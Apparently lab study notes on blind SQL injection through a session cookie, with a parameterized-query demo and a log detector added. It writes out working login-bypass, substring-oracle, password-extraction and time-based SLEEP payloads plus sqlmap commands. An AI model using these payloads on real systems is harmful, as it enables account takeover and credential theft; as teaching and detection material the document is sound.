
Blind Injection

Run the website through Burp Intercept and Repeater.

Automate finding the injection:

  1. Copy the request that sends the credentials into a txt file
  2. Use sqlmap:
    1. sqlmap -r request.txt
    2. On a live target, answer Y to the question
  3. Result: not injectable. It is more worthwhile to look at other functionalities of the

We know that it gives us a cookie (session=cookieHere) and then uses that for our session.

  • We want to know what it takes from us and uses, so we can test by changing whatever that is. For example, if it suggests a plugin for our browser, that means it takes User-Agent into account and we can play around with it to break the website.

Example:

Valid session ID:

Cookie: session=6967cabefd763ac1a1a88e11159957dba

Trying an invalid session ID with SQL injection:

Cookie: session=6967cabefd763ac1a1a88e11159957dba' or 1=1#

also authenticates us!

How do we inject with this?

6967cabefd763ac1a1a88e11159957dba' or substring('a', 1, 1) = 'a'#

substring(string, start, length): the first character is position 1, and the third argument is how many characters to take.

so:

6967cabefd763ac1a1a88e11159957dba' or substring('alex', 1, 3) = 'ale'#

is also true

Use it in the database:

6967cabefd763ac1a1a88e11159957dba' or substring((select version()), 1, 1) = '7'#

This statement tests whether the version string starts with '7'. The select is wrapped in parentheses so it runs as a subquery and resolves first.

We get a fail (we know it’s 8).

Enumerate the version:

6967cabefd763ac1a1a88e11159957dba' or substring((select version()), 1, 3) = '8.0'#

correct

6967cabefd763ac1a1a88e11159957dba' or substring((select version()), 1, 5) = '8.0.1'#

wrong

6967cabefd763ac1a1a88e11159957dba' or substring((select version()), 1, 5) = '8.0.2'#

wrong

6967cabefd763ac1a1a88e11159957dba' or substring((select version()), 1, 5) = '8.0.3'#

right!

DB version is 8.0.3

How do we extract the user's password?

6967cabefd763ac1a1a88e11159957dba' or substring((select password from injection0x02 where username = 'jessamy'), 1, 1) = '§z§'#

Send it to Intruder (the §z§ marks the payload position) and let it do the guessing for us.
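What makes both substring oracles above work is that the cookie value is pasted into the SQL text. The following is an added example, not code from the page's course or lab: a hypothetical session lookup written the vulnerable way beside the same lookup with a bound parameter, run against an in-memory SQLite copy of the table shape seen in the sqlmap dump. SQLite stands in for MySQL, so the payloads use `--` as the comment where the page used `#`, and `substr` in place of `substring`.

```python
import sqlite3

# Constructed in-memory copy of the table shape the page's sqlmap dump shows
# (injection0x02 with email/password/username/session); SQLite stands in for MySQL.
ROWS = [
    ("jeremy@example.com", "jeremy", "jeremy", "6967cabefd763ac1a1a88e11159957db"),
    ("jessamy@example.com", "ZWFzdGVyZWdn", "jessamy", "9dedc6891e2839a791ed37157f1241fe"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE injection0x02 (email TEXT, password TEXT, username TEXT, session TEXT)"
    )
    conn.executemany("INSERT INTO injection0x02 VALUES (?, ?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, session_cookie):
    """Hypothetical session check that builds SQL by string concatenation.
    The cookie value becomes SQL text, so a quote, OR and comment in it rewrite the WHERE."""
    sql = f"SELECT username FROM injection0x02 WHERE session = '{session_cookie}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:  # malformed payloads raise; treat that as "not logged in"
        return None
    return row[0] if row else None


def lookup_safe(conn, session_cookie):
    """Same check with a bound parameter: the cookie is only ever compared as data."""
    row = conn.execute(
        "SELECT username FROM injection0x02 WHERE session = ?", (session_cookie,)
    ).fetchone()
    return row[0] if row else None


# Payloads follow the page's shape; '--' is SQLite's comment where the page used MySQL's '#'.
TAUTOLOGY = "x' or 1=1--"
ORACLE_TRUE = (
    "x' or substr((select password from injection0x02 where username = 'jessamy'), 1, 1) = 'Z'--"
)
ORACLE_FALSE = (
    "x' or substr((select password from injection0x02 where username = 'jessamy'), 1, 1) = 'x'--"
)


def demo():
    """Run each payload through both lookups and return who they log in as (None = nobody)."""
    conn = make_db()
    return {
        "vuln_tautology": lookup_vulnerable(conn, TAUTOLOGY),        # 'jeremy': first row wins
        "vuln_oracle_true": lookup_vulnerable(conn, ORACLE_TRUE),    # 'jeremy': the guess matched
        "vuln_oracle_false": lookup_vulnerable(conn, ORACLE_FALSE),  # None: the guess missed
        "safe_tautology": lookup_safe(conn, TAUTOLOGY),              # None
        "safe_oracle_true": lookup_safe(conn, ORACLE_TRUE),          # None
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable lookup answers one yes/no question per request (logged in or not), which is exactly the bit the substring probes read; the parameterized lookup gives the same answer (nobody) for every tampered cookie, so there is nothing to infer. One caveat on the demo: SQLite compares text case-sensitively, so 'Z' and 'z' differ here, whereas MySQL's default collation would treat them as equal.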

OR use sqlmap:

sudo sqlmap -r request2.txt --level=2 #-T injection0x02 --threads 10

(everything after # is a shell comment, so -T and --threads are not passed in this form)

--level=2 so sqlmap also tests the cookie values

Payload reported by sqlmap:

Payload: session=6967cabefd763ac1a1a88e11159957dba' AND (SELECT 1517 FROM (SELECT(SLEEP(5)))fMVm) AND 'Qdaw'='Qdaw

Prompts: levels question: yes

Integers: he said no the first time and yes the second time (unclear why)

Is vulnerable, keep testing for others?: no

Dumped table:
+---------------------+--------------+----------+----------------------------------+
| email               | password     | username | session                          |
+---------------------+--------------+----------+----------------------------------+
| jeremy@example.com  | jeremy       | jeremy   | 6967cabefd763ac1a1a88e11159957db |
| jessamy@example.com | ZWFzdGVyZWdn | jessamy  | 9dedc6891e2839a791ed37157f1241fe |
+---------------------+--------------+----------+----------------------------------+
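A log-side check for the cookie tampering shown above, as an added example that is not part of the page's course or of sqlmap: it scans per-request records for SQL syntax inside the session cookie, groups hits by client, and raises separate reasons for the tautology bypass, for repeated substring probing (the boolean-blind pattern Intruder or sqlmap produces) and for a SLEEP payload paired with a slow response (the time-based payload sqlmap reported). The tab-separated log format, client IPs and response times are constructed; the cookie values are the page's own probes.

```python
import re
from collections import defaultdict

# Constructed tab-separated records: client IP, session cookie value, status, response ms.
SAMPLE_LOG = "\n".join([
    "10.0.0.5\t6967cabefd763ac1a1a88e11159957dba\t200\t41",
    "10.0.0.9\t6967cabefd763ac1a1a88e11159957dba' or 1=1#\t200\t39",
    "10.0.0.9\t6967cabefd763ac1a1a88e11159957dba' or substring((select version()), 1, 3) = '8.0'#\t200\t44",
    "10.0.0.9\t6967cabefd763ac1a1a88e11159957dba' or substring((select password from injection0x02 where username = 'jessamy'), 1, 1) = 'a'#\t200\t40",
    "10.0.0.9\t6967cabefd763ac1a1a88e11159957dba' AND (SELECT 1517 FROM (SELECT(SLEEP(5)))fMVm) AND 'Qdaw'='Qdaw\t200\t5042",
    "10.0.0.7\t9dedc6891e2839a791ed37157f1241fe\t200\t38",
])

# SQL syntax that has no business inside a hex session token.
INDICATORS = {
    "tautology": re.compile(r"'\s*(or|and)\b", re.I),         # closing quote, then OR/AND
    "substring-probe": re.compile(r"\bsubstr(ing)?\s*\(", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "sleep": re.compile(r"\bsleep\s*\(", re.I),
    "comment-terminator": re.compile(r"(#|--)\s*$"),
}
HEX_TOKEN = re.compile(r"^[0-9a-f]+$")  # shape of a legitimate session value on this app


def classify_cookie(value):
    """Return the sorted indicator names matched by one cookie value ([] if it looks clean)."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(value)}
    if not HEX_TOKEN.match(value):
        hits.add("non-hex-token")
    return sorted(hits)


def analyze(log_text, probe_threshold=3, slow_ms=4000):
    """Group tampered requests by client and return {ip: sorted reason codes}."""
    per_ip = defaultdict(lambda: {"probes": 0, "hits": set(), "slow_sleep": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ip, cookie, _status, ms = line.split("\t")
        hits = classify_cookie(cookie)
        if not hits:
            continue
        rec = per_ip[ip]
        rec["probes"] += 1
        rec["hits"].update(hits)
        # A SLEEP() payload that really did delay the response is the time-based signal.
        if "sleep" in hits and int(ms) >= slow_ms:
            rec["slow_sleep"] += 1

    alerts = {}
    for ip, rec in per_ip.items():
        reasons = set()
        if "tautology" in rec["hits"]:
            reasons.add("auth-bypass-attempt")
        # Many tampered cookies carrying substring() from one client = character-by-character inference.
        if rec["probes"] >= probe_threshold and "substring-probe" in rec["hits"]:
            reasons.add("boolean-blind-inference")
        if rec["slow_sleep"]:
            reasons.add("time-based-blind")
        if reasons:
            alerts[ip] = sorted(reasons)
    return alerts


if __name__ == "__main__":
    for ip, reasons in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

The per-client count matters more than any single pattern: one odd cookie is noise, but dozens of cookies that differ only in the guessed character is the inference loop itself, and a 5-second response on an endpoint that normally answers in 40 ms is the SLEEP(5) from the payload above showing up in the timing column.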